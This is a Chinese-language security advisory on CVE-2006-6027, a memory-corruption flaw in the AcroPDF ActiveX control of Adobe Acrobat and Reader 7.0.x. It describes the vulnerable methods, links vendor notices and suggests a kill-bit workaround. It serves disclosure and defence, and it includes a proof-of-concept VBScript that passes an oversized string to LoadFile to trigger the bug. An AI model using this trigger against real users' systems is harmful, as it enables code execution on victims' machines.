发布日期：2006-11-28
更新日期：2006-11-30

受影响系统：

Adobe Acrobat 7.0.0 - 7.0.8
Adobe Adobe Reader 7.0.0 - 7.0.8

描述：

---

BUGTRAQ  ID: 21338,21155
CVE(CAN) ID: CVE-2006-6027

Adobe Reader和Acrobat都是非常流行的PDF文件阅读器。

Adobe Reader和Acrobat的AcroPDF ActiveX控件没有正确处理可能的畸形参数，远程攻击者可能利用此漏洞在用户机器上执行任意指令。

AcroPDF ActiveX控件（AcroPDF.dll）没有正确地处理传送给src()、setPageMode()、setLayoutMode()、setNamedDest()和LoadFile()方法的畸形参数。如果用户受骗访问了特制的web页面的话，就可能会触发内存破坏，导致执行任意指令。

<*来源：FrSIRT
  
  链接：http://www.frsirt.com/english/advisories/2006/4751
        http://www.adobe.com/support/security/advisories/apsa06-02.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:CA8A9780-280D-11CF-A24D-444553540000' id='target'
/>
<script language='vbscript'>

targetFile = "C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroPDF.dll"
prototype  = "Function LoadFile ( ByVal fileName As String ) As Boolean"
memberName = "LoadFile"
progid     = "AcroPDFLib.AcroPDF"
argCount   = 1

arg1=String(6164, "A")

target.LoadFile arg1

</script></job></package>

建议：

---

临时解决方法：

* 为CLSID {CA8A9780-280D-11CF-A24D-444553540000}设置kill bit，或删除AcroPDF.dll。

厂商补丁：

Adobe
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.adobe.com

浏览次数：5027
严重程度：0（网友投票）